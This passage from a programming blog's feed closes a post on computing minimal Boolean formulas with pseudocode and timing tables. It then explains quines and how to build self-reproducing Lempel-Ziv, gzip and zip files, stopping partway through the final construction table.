write the &ldquo;adding bits&rdquo; version of find. </p> <p class=pp> The final algorithm is: </p> <pre class="indent alg"> // Algorithm 5 func compute(): for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 // Generate functions. for k = 1 to max_generate for each canonical function f for each function ff equivalent to f for each canonical function g of size k &#8722; size(f) &#8722; 1 visit(k, ff OR g) visit(k, ff AND g) visit(k, ff AND &#172;g) visit(k, &#172;ff AND g) // Search for functions. for k = max_generate+1 to &#8734; for each missing function fg for each canonical function g fsize = k &#8722; size(g) &#8722; 1 if fg OR g == fg if f = find(fg AND &#172;g, g, fsize) succeeds visit(k, fg) next fg if fg OR &#172;g == fg if f = find(fg AND g, &#172;g, fsize) succeeds visit(k, fg) next fg if &#172;fg OR g == &#172;fg if f = find(&#172;fg AND &#172;g, g, fsize) succeeds visit(k, fg) next fg if &#172;fg OR &#172;g == &#172;fg if f = find(&#172;fg AND g, &#172;g, fsize) succeeds visit(k, fg) next fg if nvisited == 2<sup>2<sup>n</sup></sup> return func visit(d, fg): if size[fg] != &#8734; return record fg as canonical for each function ffgg equivalent to fg if size[ffgg] != &#8734; size[ffgg] = d nvisited += 2 // counts ffgg and &#172;ffgg return func find(x, any, xsize): if size(x) == xsize return x while any != 0 bit = any AND &#8722;any // rightmost 1 bit in any any = any AND &#172;bit if f = find(x OR bit, any, xsize) succeeds return f return failure </pre> <p class=lp> To get a sense of the speedup here, and to check my work, I ran the program using both algorithms on a 2.53 GHz Intel Core 2 Duo E7200. </p> <center> <table id=times> <tr><th> <th colspan=3>&#8212;&#8212;&#8212;&#8212;&#8212; # of Functions &#8212;&#8212;&#8212;&#8212;&#8212;<th colspan=2>&#8212;&#8212;&#8212;&#8212; Time &#8212;&#8212;&#8212;&#8212; <tr><th>Size <th>Canonical <th>All <th>All, Cumulative <th>Generate <th>Search <tr><td>0 <td>1 <td>10 <td>10 <tr><td>1 <td>2 <td>82 <td>92 <td>&lt; 0.1 seconds <td>3.4 minutes <tr><td>2 <td>2 <td>640 <td>732 <td>&lt; 0.1 seconds <td>7.2 minutes <tr><td>3 <td>7 <td>4420 <td>5152 <td>&lt; 0.1 seconds <td>12.3 minutes <tr><td>4 <td>19 <td>25276 <td>29696 <td>&lt; 0.1 seconds <td>30.1 minutes <tr><td>5 <td>44 <td>117440 <td>147136 <td>&lt; 0.1 seconds <td>1.3 hours <tr><td>6 <td>142 <td>515040 <td>662176 <td>&lt; 0.1 seconds <td>3.5 hours <tr><td>7 <td>436 <td>1999608 <td>2661784 <td>0.2 seconds <td>11.6 hours <tr><td>8 <td>1209 <td>6598400 <td>9260184 <td>0.6 seconds <td>1.7 days <tr><td>9 <td>3307 <td>19577332 <td>28837516 <td>1.7 seconds <td>4.9 days <tr><td>10 <td>7741 <td>50822560 <td>79660076 <td>4.6 seconds <td>[ 10 days ? ] <tr><td>11 <td>17257 <td>114619264 <td>194279340 <td>10.8 seconds <td>[ 20 days ? ] <tr><td>12 <td>31851 <td>221301008 <td>415580348 <td>21.7 seconds <td>[ 50 days ? ] <tr><td>13 <td>53901 <td>374704776 <td>790285124 <td>38.5 seconds <td>[ 80 days ? ] <tr><td>14 <td>75248 <td>533594528 <td>1323879652 <td>58.7 seconds <td>[ 100 days ? ] <tr><td>15 <td>94572 <td>667653642 <td>1991533294 <td>1.5 minutes <td>[ 120 days ? ] <tr><td>16 <td>98237 <td>697228760 <td>2688762054 <td>2.1 minutes <td>[ 120 days ? ] <tr><td>17 <td>89342 <td>628589440 <td>3317351494 <td>4.1 minutes <td>[ 90 days ? ] <tr><td>18 <td>66951 <td>468552896 <td>3785904390 <td>9.1 minutes <td>[ 50 days ? ] <tr><td>19 <td>41664 <td>287647616 <td>4073552006 <td>23.4 minutes <td>[ 30 days ? ] <tr><td>20 <td>21481 <td>144079832 <td>4217631838 <td>57.0 minutes <td>[ 10 days ? ] <tr><td>21 <td>8680 <td>55538224 <td>4273170062 <td>2.4 hours <td>2.5 days <tr><td>22 <td>2730 <td>16099568 <td>4289269630 <td>5.2 hours <td>11.7 hours <tr><td>23 <td>937 <td>4428800 <td>4293698430 <td>11.2 hours <td>2.2 hours <tr><td>24 <td>228 <td>959328 <td>4294657758 <td>22.0 hours <td>33.2 minutes <tr><td>25 <td>103 <td>283200 <td>4294940958 <td>1.7 days <td>4.0 minutes <tr><td>26 <td>21 <td>22224 <td>4294963182 <td>2.9 days <td>42 seconds <tr><td>27 <td>10 <td>3602 <td>4294966784 <td>4.7 days <td>2.4 seconds <tr><td>28 <td>3 <td>512 <td>4294967296 <td>[ 7 days ? ] <td>0.1 seconds </table> </center> <p class=pp> The bracketed times are estimates based on the work involved: I did not wait that long for the intermediate search steps. The search algorithm is quite a bit worse than generate until there are very few functions left to find. However, it comes in handy just when it is most useful: when the generate algorithm has slowed to a crawl. If we run generate through formulas of size 22 and then switch to search for 23 onward, we can run the whole computation in just over half a day of CPU time. </p> <p class=pp> The computation of a(5) identified the sizes of all 616,126 canonical Boolean functions of 5 inputs. In contrast, there are <a href="http://oeis.org/A000370">just over 200 trillion canonical Boolean functions of 6 inputs</a>. Determining a(6) is unlikely to happen by brute force computation, no matter what clever tricks we use. </p> <h3>Adding XOR</h3> <p class=pp>We've assumed the use of just AND and OR as our basis for the Boolean formulas. If we also allow XOR, functions can be written using many fewer operators. In particular, a hardest function for the 1-, 2-, 3-, and 4-input cases&#8212;parity&#8212;is now trivial. Knuth examines the complexity of 5-input Boolean functions using AND, OR, and XOR in detail in <a href="http://www-cs-faculty.stanford.edu/~uno/taocp.html">The Art of Computer Programming, Volume 4A</a>. Section 7.1.2's Algorithm L is the same as our Algorithm 3 above, given for computing 4-input functions. Knuth mentions that to adapt it for 5-input functions one must treat only canonical functions and gives results for 5-input functions with XOR allowed. So another way to check our work is to add XOR to our Algorithm 4 and check that our results match Knuth's. </p> <p class=pp> Because the minimum formula sizes are smaller (at most 12), the computation of sizes with XOR is much faster than before: </p> <center> <table> <tr><th> <th><th colspan=5>&#8212;&#8212;&#8212;&#8212;&#8212; # of Functions &#8212;&#8212;&#8212;&#8212;&#8212;<th> <tr><th>Size <th width=10><th>Canonical <th width=10><th>All <th width=10><th>All, Cumulative <th width=10><th>Time <tr><td align=right>0 <td><td align=right>1 <td><td align=right>10 <td><td align=right>10 <td><td> <tr><td align=right>1 <td><td align=right>3 <td><td align=right>102 <td><td align=right>112 <td><td align=right>&lt; 0.1 seconds <tr><td align=right>2 <td><td align=right>5 <td><td align=right>1140 <td><td align=right>1252 <td><td align=right>&lt; 0.1 seconds <tr><td align=right>3 <td><td align=right>20 <td><td align=right>11570 <td><td align=right>12822 <td><td align=right>&lt; 0.1 seconds <tr><td align=right>4 <td><td align=right>93 <td><td align=right>109826 <td><td align=right>122648 <td><td align=right>&lt; 0.1 seconds <tr><td align=right>5 <td><td align=right>366 <td><td align=right>936440 <td><td align=right>1059088 <td><td align=right>0.1 seconds <tr><td align=right>6 <td><td align=right>1730 <td><td align=right>7236880 <td><td align=right>8295968 <td><td align=right>0.7 seconds <tr><td align=right>7 <td><td align=right>8782 <td><td align=right>47739088 <td><td align=right>56035056 <td><td align=right>4.5 seconds <tr><td align=right>8 <td><td align=right>40297 <td><td align=right>250674320 <td><td align=right>306709376 <td><td align=right>24.0 seconds <tr><td align=right>9 <td><td align=right>141422 <td><td align=right>955812256 <td><td align=right>1262521632 <td><td align=right>95.5 seconds <tr><td align=right>10 <td><td align=right>273277 <td><td align=right>1945383936 <td><td align=right>3207905568 <td><td align=right>200.7 seconds <tr><td align=right>11 <td><td align=right>145707 <td><td align=right>1055912608 <td><td align=right>4263818176 <td><td align=right>121.2 seconds <tr><td align=right>12 <td><td align=right>4423 <td><td align=right>31149120 <td><td align=right>4294967296 <td><td align=right>65.0 seconds </table> </center> <p class=pp> Knuth does not discuss anything like Algorithm 5, because the search for specific functions does not apply to the AND, OR, and XOR basis. XOR is a non-monotone function (it can both turn bits on and turn bits off), so there is no test like our &ldquo;<code>if fg OR g == fg</code>&rdquo; and no small set of &ldquo;don't care&rdquo; bits to trim the search for f. The search for an appropriate f in the XOR case would have to try all f of the right size, which is exactly what Algorithm 4 already does. </p> <p class=pp> Volume 4A also considers the problem of building minimal circuits, which are like formulas but can use common subexpressions additional times for free, and the problem of building the shallowest possible circuits. See Section 7.1.2 for all the details. </p> <h3>Code and Web Site</h3> <p class=pp> The web site <a href="http://boolean-oracle.swtch.com">boolean-oracle.swtch.com</a> lets you type in a Boolean expression and gives back the minimal formula for it. It uses tables generated while running Algorithm 5; those tables and the programs described in this post are also <a href="http://boolean-oracle.swtch.com/about">available on the site</a>. </p> <h3>Postscript: Generating All Permutations and Inversions</h3> <p class=pp> The algorithms given above depend crucially on the step &ldquo;<code>for each function ff equivalent to f</code>,&rdquo; which generates all the ff obtained by permuting or inverting inputs to f, but I did not explain how to do that. We already saw that we can manipulate the binary truth table representation directly to turn <code>f</code> into <code>&#172;f</code> and to compute combinations of functions. We can also manipulate the binary representation directly to invert a specific input or swap a pair of adjacent inputs. Using those operations we can cycle through all the equivalent functions. </p> <p class=pp> To invert a specific input, let's consider the structure of the truth table. The index of a bit in the truth table encodes the inputs for that entry. For example, the low bit of the index gives the value of the first input. So the even-numbered bits&#8212;at indices 0, 2, 4, 6, ...&#8212;correspond to the first input being false, while the odd-numbered bits&#8212;at indices 1, 3, 5, 7, ...&#8212;correspond to the first input being true. Changing just that bit in the index corresponds to changing the single variable, so indices 0, 1 differ only in the value of the first input, as do 2, 3, and 4, 5, and 6, 7, and so on. Given the truth table for f(V, W, X, Y, Z) we can compute the truth table for f(&#172;V, W, X, Y, Z) by swapping adjacent bit pairs in the original truth table. Even better, we can do all the swaps in parallel using a bitwise operation. To invert a different input, we swap larger runs of bits. </p> <center> <table> <tr><th>Function <th width=10> <th>Truth Table (<span style="font-weight: normal;"><code>f</code> = f(V, W, X, Y, Z)</span>) <tr><td>f(&#172;V, W, X, Y, Z) <td><td><code>(f&amp;0x55555555)&lt;&lt;&nbsp;1 | (f&gt;&gt;&nbsp;1)&amp;0x55555555</code> <tr><td>f(V, &#172;W, X, Y, Z) <td><td><code>(f&amp;0x33333333)&lt;&lt;&nbsp;2 | (f&gt;&gt;&nbsp;2)&amp;0x33333333</code> <tr><td>f(V, W, &#172;X, Y, Z) <td><td><code>(f&amp;0x0f0f0f0f)&lt;&lt;&nbsp;4 | (f&gt;&gt;&nbsp;4)&amp;0x0f0f0f0f</code> <tr><td>f(V, W, X, &#172;Y, Z) <td><td><code>(f&amp;0x00ff00ff)&lt;&lt;&nbsp;8 | (f&gt;&gt;&nbsp;8)&amp;0x00ff00ff</code> <tr><td>f(V, W, X, Y, &#172;Z) <td><td><code>(f&amp;0x0000ffff)&lt;&lt;16 | (f&gt;&gt;16)&amp;0x0000ffff</code> </table> </center> <p class=lp> Being able to invert a specific input lets us consider all possible inversions by building them up one at a time. The <a href="http://oeis.org/A003188">Gray code</a> lets us enumerate all possible 5-bit input codes while changing only 1 bit at a time as we move from one input to the next: </p> <center> 0, 1, 3, 2, 6, 7, 5, 4, <br> 12, 13, 15, 14, 10, 11, 9, 8, <br> 24, 25, 27, 26, 30, 31, 29, 28, <br> 20, 21, 23, 22, 18, 19, 17, 16 </center> <p class=lp> This minimizes the number of inversions we need: to consider all 32 cases, we only need 31 inversion operations. In contrast, visiting the 5-bit input codes in the usual binary order 0, 1, 2, 3, 4, ... would often need to change multiple bits, like when changing from 3 to 4. </p> <p class=pp> To swap a pair of adjacent inputs, we can again take advantage of the truth table. For a pair of inputs, there are four cases: 00, 01, 10, and 11. We can leave the 00 and 11 cases alone, because they are invariant under swapping, and concentrate on swapping the 01 and 10 bits. The first two inputs change most often in the truth table: each run of 4 bits corresponds to those four cases. In each run, we want to leave the first and fourth alone and swap the second and third. For later inputs, the four cases consist of sections of bits instead of single bits. </p> <center> <table> <tr><th>Function <th width=10> <th>Truth Table (<span style="font-weight: normal;"><code>f</code> = f(V, W, X, Y, Z)</span>) <tr><td>f(<b>W, V</b>, X, Y, Z) <td><td><code>f&amp;0x99999999 | (f&amp;0x22222222)&lt;&lt;1 | (f&gt;&gt;1)&amp;0x22222222</code> <tr><td>f(V, <b>X, W</b>, Y, Z) <td><td><code>f&amp;0xc3c3c3c3 | (f&amp;0x0c0c0c0c)&lt;&lt;1 | (f&gt;&gt;1)&amp;0x0c0c0c0c</code> <tr><td>f(V, W, <b>Y, X</b>, Z) <td><td><code>f&amp;0xf00ff00f | (f&amp;0x00f000f0)&lt;&lt;1 | (f&gt;&gt;1)&amp;0x00f000f0</code> <tr><td>f(V, W, X, <b>Z, Y</b>) <td><td><code>f&amp;0xff0000ff | (f&amp;0x0000ff00)&lt;&lt;8 | (f&gt;&gt;8)&amp;0x0000ff00</code> </table> </center> <p class=lp> Being able to swap a pair of adjacent inputs lets us consider all possible permutations by building them up one at a time. Again it is convenient to have a way to visit all permutations by applying only one swap at a time. Here Volume 4A comes to the rescue. Section 7.2.1.2 is titled &ldquo;Generating All Permutations,&rdquo; and Knuth delivers many algorithms to do just that. The most convenient for our purposes is Algorithm P, which generates a sequence that considers all permutations exactly once with only a single swap of adjacent inputs between steps. Knuth calls it Algorithm P because it corresponds to the &ldquo;Plain changes&rdquo; algorithm used by <a href="http://en.wikipedia.org/wiki/Change_ringing">bell ringers in 17th century England</a> to ring a set of bells in all possible permutations. The algorithm is described in a manuscript written around 1653! </p> <p class=pp> We can examine all possible permutations and inversions by nesting a loop over all permutations inside a loop over all inversions, and in fact that's what my program does. Knuth does one better, though: his Exercise 7.2.1.2-20 suggests that it is possible to build up all the possibilities using only adjacent swaps and inversion of the first input. Negating arbitrary inputs is not hard, though, and still does minimal work, so the code sticks with Gray codes and Plain changes. </p></p> Zip Files All The Way Down tag:research.swtch.com,2012:research.swtch.com/zip 2010-03-18T00:00:00-04:00 2010-03-18T00:00:00-04:00 Did you think it was turtles? <p><p class=lp> Stephen Hawking begins <i><a href="http://www.amazon.com/-/dp/0553380168">A Brief History of Time</a></i> with this story: </p> <blockquote> <p class=pp> A well-known scientist (some say it was Bertrand Russell) once gave a public lecture on astronomy. He described how the earth orbits around the sun and how the sun, in turn, orbits around the center of a vast collection of stars called our galaxy. At the end of the lecture, a little old lady at the back of the room got up and said: &ldquo;What you have told us is rubbish. The world is really a flat plate supported on the back of a giant tortoise.&rdquo; The scientist gave a superior smile before replying, &ldquo;What is the tortoise standing on?&rdquo; &ldquo;You're very clever, young man, very clever,&rdquo; said the old lady. &ldquo;But it's turtles all the way down!&rdquo; </p> </blockquote> <p class=lp> Scientists today are pretty sure that the universe is not actually turtles all the way down, but we can create that kind of situation in other contexts. For example, here we have <a href="http://www.youtube.com/watch?v=Y-gqMTt3IUg">video monitors all the way down</a> and <a href="http://www.amazon.com/gp/customer-media/product-gallery/0387900926/ref=cm_ciu_pdp_images_all">set theory books all the way down</a>, and <a href="http://blog.makezine.com/archive/2009/01/thousands_of_shopping_carts_stake_o.html">shopping carts all the way down</a>. </p> <p class=pp> And here's a computer storage equivalent: look inside <a href="http://swtch.com/r.zip"><code>r.zip</code></a>. It's zip files all the way down: each one contains another zip file under the name <code>r/r.zip</code>. (For the die-hard Unix fans, <a href="http://swtch.com/r.tar.gz"><code>r.tar.gz</code></a> is gzipped tar files all the way down.) Like the line of shopping carts, it never ends, because it loops back onto itself: the zip file contains itself! And it's probably less work to put together a self-reproducing zip file than to put together all those shopping carts, at least if you're the kind of person who would read this blog. This post explains how. </p> <p class=pp> Before we get to self-reproducing zip files, though, we need to take a brief detour into self-reproducing programs. </p> <h3>Self-reproducing programs</h3> <p class=pp> The idea of self-reproducing programs dates back to the 1960s. My favorite statement of the problem is the one Ken Thompson gave in his 1983 Turing Award address: </p> <blockquote> <p class=pp> In college, before video games, we would amuse ourselves by posing programming exercises. One of the favorites was to write the shortest self-reproducing program. Since this is an exercise divorced from reality, the usual vehicle was FORTRAN. Actually, FORTRAN was the language of choice for the same reason that three-legged races are popular. </p> <p class=pp> More precisely stated, the problem is to write a source program that, when compiled and executed, will produce as output an exact copy of its source. If you have never done this, I urge you to try it on your own. The discovery of how to do it is a revelation that far surpasses any benefit obtained by being told how to do it. The part about &ldquo;shortest&rdquo; was just an incentive to demonstrate skill and determine a winner. </p> </blockquote> <p class=lp> <b>Spoiler alert!</b> I agree: if you have never done this, I urge you to try it on your own. The internet makes it so easy to look things up that it's refreshing to discover something yourself once in a while. Go ahead and spend a few days figuring out. This blog will still be here when you get back. (If you don't mind the spoilers, the entire <a href="http://cm.bell-labs.com/who/ken/trust.html">Turing award address</a> is worth reading.) </p> <center> <br><br> <i>(Spoiler blocker.)</i> <br> <a href="http://www.robertwechsler.com/projects.html"><img src="http://research.swtch.com/applied_geometry.jpg"></a> <br> <i><a href="http://www.robertwechsler.com/projects.html">http://www.robertwechsler.com/projects.html</a></i> <br><br> </center> <p class=pp> Let's try to write a Python program that prints itself. It will probably be a <code>print</code> statement, so here's a first attempt, run at the interpreter prompt: </p> <pre class=indent> &gt;&gt;&gt; print '<span style="color: #005500">hello</span>' hello </pre> <p class=lp> That didn't quite work. But now we know what the program is, so let's print it: </p> <pre class=indent> &gt;&gt;&gt; print "<span style="color: #005500">print 'hello'</span>" print 'hello' </pre> <p class=lp> That didn't quite work either. The problem is that when you execute a simple print statement, it only prints part of itself: the argument to the print. We need a way to print the rest of the program too. </p> <p class=pp> The trick is to use recursion: you write a string that is the whole program, but with itself missing, and then you plug it into itself before passing it to print. </p> <pre class=indent> &gt;&gt;&gt; s = '<span style="color: #005500">print %s</span>'; print s % repr(s) print 'print %s' </pre> <p class=lp> Not quite, but closer: the problem is that the string <code>s</code> isn't actually the program. But now we know the general form of the program: <code>s = '<span style="color: #005500">%s</span>'; print s % repr(s)</code>. That's the string to use. </p> <pre class=indent> &gt;&gt;&gt; s = '<span style="color: #005500">s = %s; print s %% repr(s)</span>'; print s % repr(s) s = 's = %s; print s %% repr(s)'; print s % repr(s) </pre> <p class=lp> Recursion for the win. </p> <p class=pp> This form of self-reproducing program is often called a <a href="http://en.wikipedia.org/wiki/Quine_(computing)">quine</a>, in honor of the philosopher and logician W. V. O. Quine, who discovered the paradoxical sentence: </p> <blockquote> &ldquo;Yields falsehood when preceded by its quotation&rdquo;<br>yields falsehood when preceded by its quotation. </blockquote> <p class=lp> The simplest English form of a self-reproducing quine is a command like: </p> <blockquote> Print this, followed by its quotation:<br>&ldquo;Print this, followed by its quotation:&rdquo; </blockquote> <p class=lp> There's nothing particularly special about Python that makes quining possible. The most elegant quine I know is a Scheme program that is a direct, if somewhat inscrutable, translation of that sentiment: </p> <pre class=indent> ((lambda (x) `<span style="color: #005500">(</span>,x <span style="color: #005500">'</span>,x<span style="color: #005500">)</span>) '<span style="color: #005500">(lambda (x) `(,x ',x))</span>) </pre> <p class=lp> I think the Go version is a clearer translation, at least as far as the quoting is concerned: </p> <pre class=indent> /* Go quine */ package main import "<span style="color: #005500">fmt</span>" func main() { fmt.Printf("<span style="color: #005500">%s%c%s%c\n</span>", q, 0x60, q, 0x60) } var q = `<span style="color: #005500">/* Go quine */ package main import "fmt" func main() { fmt.Printf("%s%c%s%c\n", q, 0x60, q, 0x60) } var q = </span>` </pre> <p class=lp>(I've colored the data literals green throughout to make it clear what is program and what is data.)</p> <p class=pp>The Go program has the interesting property that, ignoring the pesky newline at the end, the entire program is the same thing twice (<code>/* Go quine */ ... q = `</code>). That got me thinking: maybe it's possible to write a self-reproducing program using only a repetition operator. And you know what programming language has essentially only a repetition operator? The language used to encode Lempel-Ziv compressed files like the ones used by <code>gzip</code> and <code>zip</code>. </p> <h3>Self-reproducing Lempel-Ziv programs</h3> <p class=pp> Lempel-Ziv compressed data is a stream of instructions with two basic opcodes: <code>literal(</code><i>n</i><code>)</code> followed by <i>n</i> bytes of data means write those <i>n</i> bytes into the decompressed output, and <code>repeat(</code><i>d</i><code>,</code> <i>n</i><code>)</code> means look backward <i>d</i> bytes from the current location in the decompressed output and copy the <i>n</i> bytes you find there into the output stream. </p> <p class=pp> The programming exercise, then, is this: write a Lempel-Ziv program using just those two opcodes that prints itself when run. In other words, write a compressed data stream that decompresses to itself. Feel free to assume any reasonable encoding for the <code>literal</code> and <code>repeat</code> opcodes. For the grand prize, find a program that decompresses to itself surrounded by an arbitrary prefix and suffix, so that the sequence could be embedded in an actual <code>gzip</code> or <code>zip</code> file, which has a fixed-format header and trailer. </p> <p class=pp> <b>Spoiler alert!</b> I urge you to try this on your own before continuing to read. It's a great way to spend a lazy afternoon, and you have one critical advantage that I didn't: you know there is a solution. </p> <center> <br><br> <i>(Spoiler blocker.)</i> <br> <a href=""><img src="http://research.swtch.com/the_best_circular_bike(sbcc_sbma_students_roof).jpg"></a> <br> <i><a href="http://www.robertwechsler.com/thebest.html">http://www.robertwechsler.com/thebest.html</a></i> <br><br> </center> <p class=lp>By the way, here's <a href="http://swtch.com/r.gz"><code>r.gz</code></a>, gzip files all the way down. <pre class=indent> $ gunzip &lt; r.gz &gt; r $ cmp r r.gz $ </pre> <p class=lp>The nice thing about <code>r.gz</code> is that even broken web browsers that ordinarily decompress downloaded gzip data before storing it to disk will handle this file correctly! </p> <p class=pp>Enough stalling to hide the spoilers. Let's use this shorthand to describe Lempel-Ziv instructions: <code>L</code><i>n</i> and <code>R</code><i>n</i> are shorthand for <code>literal(</code><i>n</i><code>)</code> and <code>repeat(</code><i>n</i><code>,</code> <i>n</i><code>)</code>, and the program assumes that each code is one byte. <code>L0</code> is therefore the Lempel-Ziv no-op; <code>L5</code> <code>hello</code> prints <code>hello</code>; and so does <code>L3</code> <code>hel</code> <code>R1</code> <code>L1</code> <code>o</code>. </p> <p class=pp> Here's a Lempel-Ziv program that prints itself. (Each line is one instruction.) </p> <br> <center> <table border=0> <tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr> <tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">L0 L0 L0 L4</span></code></td><td></td><td><code>L0 L0 L0 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>L0 L0 L0 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">L0 L0 L0 L0</span></code></td><td></td><td><code>L0 L0 L0 L0</code></td></tr> </table> </center> <br> <p class=lp> (The two columns Code and Output contain the same byte sequence.) </p> <p class=pp> The interesting core of this program is the 6-byte sequence <code>L4 R4 L4 R4 L4 R4</code>, which prints the 8-byte sequence <code>R4 L4 R4 L4 R4 L4 R4 L4</code>. That is, it prints itself with an extra byte before and after. </p> <p class=pp> When we were trying to write the self-reproducing Python program, the basic problem was that the print statement was always longer than what it printed. We solved that problem with recursion, computing the string to print by plugging it into itself. Here we took a different approach. The Lempel-Ziv program is particularly repetitive, so that a repeated substring ends up containing the entire fragment. The recursion is in the representation of the program rather than its execution. Either way, that fragment is the crucial point. Before the final <code>R4</code>, the output lags behind the input. Once it executes, the output is one code ahead. </p> <p class=pp> The <code>L0</code> no-ops are plugged into a more general variant of the program, which can reproduce itself with the addition of an arbitrary three-byte prefix and suffix: </p> <br> <center> <table border=0> <tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500"><i>aa bb cc</i> L4</span></code></td><td></td><td><code><i>aa bb cc</i> L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code><i>aa bb cc</i> L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 <i>xx yy zz</i></span></code></td><td></td><td><code>R4 <i>xx yy zz</i></code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 <i>xx yy zz</i></code></td></tr> </table> </center> <br> <p class=lp> (The byte sequence in the Output column is <code><i>aa bb cc</i></code>, then the byte sequence from the Code column, then <code><i>xx yy zz</i></code>.) </p> <p class=pp> It took me the better part of a quiet Sunday to get this far, but by the time I got here I knew the game was over and that I'd won. From all that experimenting, I knew it was easy to create a program fragment that printed itself minus a few instructions or even one that printed an arbitrary prefix and then itself, minus a few instructions. The extra <code>aa bb cc</code> in the output provides a place to attach such a program fragment. Similarly, it's easy to create a fragment to attach to the <code>xx yy zz</code> that prints itself, minus the first three instructions, plus an arbitrary suffix. We can use that generality to attach an appropriate header and trailer. </p> <p class=pp> Here is the final program, which prints itself surrounded by an arbitrary prefix and suffix. <code>[P]</code> denotes the <i>p</i>-byte compressed form of the prefix <code>P</code>; similarly, <code>[S]</code> denotes the <i>s</i>-byte compressed form of the suffix <code>S</code>. </p> <br> <center> <table border=0> <tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print prefix</span></i></td> <td></td> <td><code>[P]</code></td> <td></td> <td><code>P</code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>print </i>p<i>+1 bytes</i></span></td> <td></td> <td><code>L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> <span style="color: #005500">[P] L</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code></code></td> <td></td> <td><code>[P] L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>repeat last </i>p<i>+1 printed bytes</i></span></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td> <td></td> <td><code>[P] L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>print 1 byte</i></span></td> <td></td> <td><code>L1 <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code></code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>print 1 byte</i></span></td> <td></td> <td><code>L1 <span style="color: #005500">L1</span></code></td> <td></td> <td><code>L1</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td> <td></td> <td><code>L4 <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code><span style="color: #005500"> L1 L1 L4</span></code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> L1 L1 L4</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td> <td></td> <td><code>R4</code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> L1 L1 L4</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td> <td></td> <td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td> <td></td> <td><code>R4 L4 R4 L4</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td> <td></td> <td><code>R4</code></td> <td></td> <td><code>R4 L4 R4 L4</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td> <td></td> <td><code>L4 <span style="color: #005500">R4 L0 L0 L</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>s</i>+1</span></span><code><span style="color: #005500"></span></code></td> <td></td> <td><code>R4 L0 L0 L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td> <td></td> <td><code>R4</code></td> <td></td> <td><code>R4 L0 L0 L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td> <td></td> <td><code>L0</code></td> <td></td> <td></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td> <td></td> <td><code>L0</code></td> <td></td> <td></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>print </i>s<i>+1 bytes</i></span></td> <td></td> <td><code>L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 